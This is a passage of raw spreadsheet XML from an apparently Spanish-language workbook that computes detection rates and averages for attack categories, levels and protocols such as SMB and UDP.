        <f>IF(CK17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK21))</f>
        <v>0</v>
      </c>
      <c r="CL22" s="667" t="str">
        <f>IF(CL17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL21))</f>
        <v>-</v>
      </c>
      <c r="CM22" s="667">
        <f>IF(CM17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM21))</f>
        <v>0</v>
      </c>
      <c r="CN22" s="667">
        <f>IF(CN17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN21))</f>
        <v>0</v>
      </c>
      <c r="CO22" s="667" t="str">
        <f>IF(CO17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO21))</f>
        <v>-</v>
      </c>
      <c r="CP22" s="667" t="str">
        <f>IF(CP17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP21))</f>
        <v>-</v>
      </c>
      <c r="CQ22" s="667" t="str">
        <f>IF(CQ17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ21))</f>
        <v>-</v>
      </c>
      <c r="CR22" s="667" t="str">
        <f>IF(CR17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR21))</f>
        <v>-</v>
      </c>
      <c r="CS22" s="667">
        <f>IF(CS17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS21))</f>
        <v>1</v>
      </c>
      <c r="CT22" s="667">
        <f>IF(CT17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT21))</f>
        <v>1</v>
      </c>
      <c r="CU22" s="667">
        <f>IF(CU17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU21))</f>
        <v>1</v>
      </c>
      <c r="CV22" s="667" t="str">
        <f>IF(CV17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV21))</f>
        <v>-</v>
      </c>
      <c r="CW22" s="667">
        <f>IF(CW17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW21))</f>
        <v>0</v>
      </c>
      <c r="CX22" s="667">
        <f>IF(CX17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX21))</f>
        <v>1</v>
      </c>
      <c r="CY22" s="668">
        <f>IF(CY17="-","-",AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY21))</f>
        <v>0.2727272727</v>
      </c>
      <c r="CZ22" s="368"/>
      <c r="DA22" s="368"/>
      <c r="DB22" s="368"/>
      <c r="DC22" s="669" t="s">
        <v>558</v>
      </c>
      <c r="DD22" s="639">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GV$3:$GV$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DC22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>1</v>
      </c>
      <c r="DE22" s="670">
        <v>1.0</v>
      </c>
      <c r="DF22" s="561" t="s">
        <v>12</v>
      </c>
      <c r="DG22" s="173">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="DH22" s="629" t="s">
        <v>12</v>
      </c>
      <c r="DI22" s="607">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="DJ22" s="608" t="s">
        <v>12</v>
      </c>
      <c r="DK22" s="609">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="DL22" s="455" t="s">
        <v>12</v>
      </c>
      <c r="DM22" s="610"/>
      <c r="DN22" s="610"/>
      <c r="DO22" s="671" t="s">
        <v>558</v>
      </c>
      <c r="DP22" s="672">
        <f>DD22/'(D) - Análisis Resultados I - S'!EB41</f>
        <v>0.5</v>
      </c>
      <c r="DQ22" s="368"/>
      <c r="DR22" s="671" t="s">
        <v>558</v>
      </c>
      <c r="DS22" s="672">
        <f>DE22/DD22</f>
        <v>1</v>
      </c>
      <c r="DT22" s="368"/>
      <c r="DU22" s="368"/>
      <c r="DV22" s="368"/>
      <c r="DW22" s="673" t="s">
        <v>2465</v>
      </c>
      <c r="DX22" s="674"/>
      <c r="DY22" s="675">
        <f t="shared" ref="DY22:DZ22" si="24">SQRT(DY20*(1-DY21))</f>
        <v>0.7589463613</v>
      </c>
      <c r="DZ22" s="676">
        <f t="shared" si="24"/>
        <v>0.8393720597</v>
      </c>
      <c r="EC22" s="636" t="s">
        <v>664</v>
      </c>
      <c r="ED22" s="637">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0</v>
      </c>
      <c r="EE22" s="336">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.5</v>
      </c>
      <c r="EF22" s="336">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.1666666667</v>
      </c>
      <c r="EG22" s="337">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC22,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC22  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.4814814815</v>
      </c>
      <c r="EH22" s="368"/>
      <c r="EI22" s="368"/>
      <c r="EJ22" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ14&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ14*'(B) - Detecciones - Ataques'!HN14/('(B) - Detecciones - Ataques'!HN14+'(B) - Detecciones - Ataques'!HO14),0)</f>
        <v>0</v>
      </c>
      <c r="EK22" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ14&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ14*'(B) - Detecciones - Ataques'!HO14/('(B) - Detecciones - Ataques'!HN14+'(B) - Detecciones - Ataques'!HO14),0)</f>
        <v>1</v>
      </c>
      <c r="EL22" s="368"/>
      <c r="EM22" s="615"/>
      <c r="EN22" s="368"/>
      <c r="EO22" s="379" t="s">
        <v>310</v>
      </c>
      <c r="EP22" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO22)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO22 &amp; "*")</f>
        <v>3</v>
      </c>
      <c r="EQ22" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO22)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO22 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="ER22" s="623">
        <f t="shared" si="13"/>
        <v>0.6</v>
      </c>
      <c r="ES22" s="401"/>
      <c r="ET22" s="402"/>
      <c r="EV22" s="368"/>
      <c r="EW22" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="EX22" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW22)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW22 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW22)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW22 &amp; "*"))</f>
        <v>0.05366134369</v>
      </c>
      <c r="EY22" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW22)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW22 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW22)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW22 &amp; "*"))</f>
        <v>1</v>
      </c>
      <c r="EZ22" s="621"/>
      <c r="FA22" s="368"/>
      <c r="FB22" s="368"/>
      <c r="FC22" s="368"/>
      <c r="FD22" s="368"/>
      <c r="FE22" s="20" t="s">
        <v>226</v>
      </c>
      <c r="FF22" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!HR3:HR139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV1")</f>
        <v>0.5164941771</v>
      </c>
      <c r="FG22" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!HS3:HS139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV1")</f>
        <v>0.6557377049</v>
      </c>
      <c r="FH22" s="336"/>
      <c r="FI22" s="368"/>
      <c r="FJ22" s="368"/>
      <c r="FK22" s="368"/>
      <c r="FN22" s="368" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMB")</f>
        <v>SMB</v>
      </c>
      <c r="FO22" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN22)</f>
        <v>1</v>
      </c>
      <c r="FP22" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN22)</f>
        <v>1</v>
      </c>
      <c r="FQ22" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN22)</f>
        <v>1</v>
      </c>
      <c r="FR22" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN22)</f>
        <v>1</v>
      </c>
      <c r="FS22" s="368"/>
      <c r="FT22" s="368"/>
      <c r="FU22" s="368"/>
      <c r="FV22" s="368"/>
      <c r="FW22" s="368"/>
      <c r="FX22" s="368"/>
    </row>
    <row r="23">
      <c r="D23" s="173"/>
      <c r="E23" s="173"/>
      <c r="DC23" s="677" t="s">
        <v>2413</v>
      </c>
      <c r="DD23" s="301">
        <f t="shared" ref="DD23:DE23" si="25">SUM(DD9:DD22)</f>
        <v>169</v>
      </c>
      <c r="DE23" s="678">
        <f t="shared" si="25"/>
        <v>169</v>
      </c>
      <c r="DF23" s="679">
        <f>DE23/DD23</f>
        <v>1</v>
      </c>
      <c r="DG23" s="680">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="DH23" s="681">
        <f>1-DF23</f>
        <v>0</v>
      </c>
      <c r="DI23" s="682">
        <f t="shared" si="4"/>
        <v>169</v>
      </c>
      <c r="DJ23" s="683">
        <f>DI23/DD23</f>
        <v>1</v>
      </c>
      <c r="DK23" s="680">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="DL23" s="684">
        <f>DK23/DD23</f>
        <v>0</v>
      </c>
      <c r="EC23" s="636" t="s">
        <v>357</v>
      </c>
      <c r="ED23" s="637">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.6666666667</v>
      </c>
      <c r="EE23" s="336">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0</v>
      </c>
      <c r="EF23" s="336">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0</v>
      </c>
      <c r="EG23" s="337">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC23,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC23  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV2"))</f>
        <v>0.5</v>
      </c>
      <c r="EJ23" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ15&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ15*'(B) - Detecciones - Ataques'!HN15/('(B) - Detecciones - Ataques'!HN15+'(B) - Detecciones - Ataques'!HO15),0)</f>
        <v>0</v>
      </c>
      <c r="EK23" s="626">
        <f>IF('(B) - Detecciones - Ataques'!HQ15&lt;&gt;0,'(B) - Detecciones - Ataques'!HQ15*'(B) - Detecciones - Ataques'!HO15/('(B) - Detecciones - Ataques'!HN15+'(B) - Detecciones - Ataques'!HO15),0)</f>
        <v>0</v>
      </c>
      <c r="EM23" s="685"/>
      <c r="EO23" s="379" t="s">
        <v>292</v>
      </c>
      <c r="EP23" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EO23)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$HM$3:$HM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO23 &amp; "*")</f>
        <v>3</v>
      </c>
      <c r="EQ23" s="401">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,EO23)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; EO23 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="ER23" s="623">
        <f t="shared" si="13"/>
        <v>0.6</v>
      </c>
      <c r="ES23" s="686"/>
      <c r="ET23" s="687"/>
      <c r="EW23" s="379" t="s">
        <v>951</v>
      </c>
      <c r="EX23" s="621">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW23)+SUMIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW23 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW23)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW23 &amp; "*"))</f>
        <v>0.9</v>
      </c>
      <c r="EY23" s="666">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW23)+SUMIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW23 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EW23)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EW23 &amp; "*"))</f>
        <v>0.9</v>
      </c>
      <c r="EZ23" s="621"/>
      <c r="FE23" s="20" t="s">
        <v>306</v>
      </c>
      <c r="FF23" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!HR3:HR139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV2")</f>
        <v>0.7104377104</v>
      </c>
      <c r="FG23" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!HS3:HS139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV2")</f>
        <v>0.8148148148</v>
      </c>
      <c r="FH23" s="173"/>
      <c r="FN23" s="36" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"UDP")</f>
        <v>UDP</v>
      </c>
      <c r="FO23" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HQ$3:$HQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN23)</f>
        <v>0.5</v>
      </c>
      <c r="FP23" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HR$3:$HR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN23)</f>
        <v>0.5</v>
      </c>
      <c r="FQ23" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$HS$3:$HS$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN23)</f>
        <v>0.5</v>
      </c>
      <c r="FR23" s="173">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,FN23)</f>
        <v>4</v>
      </c>
    </row>
    <row r="24">
      <c r="D24" s="288" t="s">
        <v>2597</v>
      </c>
      <c r="E24" s="290"/>
      <c r="EC24" s="655" t="s">
        <v>310</v>
      </c>
      <c r="ED24" s="637">
        <f>(SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EJ$11:$EJ$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.33538118</v>
      </c>
      <c r="EE24" s="336">
        <f>(SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$B$3:$B$139,$EC24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+SUMIFS($EK$11:$EK$147,'(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")) / (COUNTIFS('(B) - Detecciones - Ataques'!$B$3:$B$139,$EC24,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1")+COUNTIFS('(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; $EC24  &amp; "*",'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$AG$3:$AG$139,"LV1"))</f>
        <v>0.00001413781103</v>
      </c>
      <c r="EF24" s="336">
